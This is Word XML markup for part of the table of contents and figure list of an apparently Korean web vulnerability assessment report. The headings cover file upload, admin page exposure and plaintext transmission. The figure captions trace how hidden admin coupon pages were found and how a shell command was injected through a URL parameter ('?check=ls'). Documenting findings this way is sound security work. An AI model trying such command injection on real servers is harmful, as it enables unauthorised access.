          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D55E645" w14:textId="590AAE21" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094567" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(14)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>프로세스 검증 누락</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094567 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="336FAF79" w14:textId="365E087E" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094568" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(15)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>파일 업로드</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094568 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5EAB7698" w14:textId="3FCA8877" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094569" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(16)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>관리자 페이지 노출</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094569 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>63</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72F1838D" w14:textId="1773A106" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094570" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(17)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>위치 공개</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094570 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>66</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3650AC5D" w14:textId="5D475C1D" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094571" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(18)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>데이터 평문 전송</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094571 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>69</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FF1343D" w14:textId="0D40DFFB" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094572" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>Ⅰ. 별첨</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094572 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>71</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="736DFACC" w14:textId="24BF2AF6" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094573" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>취약점진단 방법론</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094573 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>71</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4434BB44" w14:textId="5D3B60DD" w:rsidR="00D811DC" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D811DC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3600FD84" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRPr="00545AC8" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">그림 </w:t>
      </w:r>
      <w:r w:rsidRPr="00545AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>목차</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A7450" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EE1F4C" w14:textId="2C7719D0" w:rsidR="00B9713E" w:rsidRDefault="005D30D0">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "[그림]" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc209094574" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 1. 메인에서 “쿠폰” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094574 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="0041664A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E339307" w14:textId="7BD36C82" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094575" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 2. 쿠폰 목록에서 “페이지 소스 보기” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094575 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B9C6D61" w14:textId="2A1BDD67" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094576" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 3. 페이지 소스에서 “/adminCouponDetailForm.do” 페이지 경로 발견</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094576 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B1CE333" w14:textId="288DEA12" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094577" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 4. URL 주소창에 “/adminCouponList.do” 입력</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094577 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E4507DF" w14:textId="6D3FE461" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094578" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 5. 관리자용 쿠폰 관리 페이지 접속, “서버관리” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094578 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="394BE8E1" w14:textId="17771ADF" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094579" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 6. “확인” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094579 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3031C4C0" w14:textId="160C65F0" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094580" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 7. Burp Suite -&gt; Intercept on 후, check 파라미터 존재 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094580 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0055B865" w14:textId="04FACA57" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094581" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 8. URL 주소 뒤에 “?check=ls” 입력</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
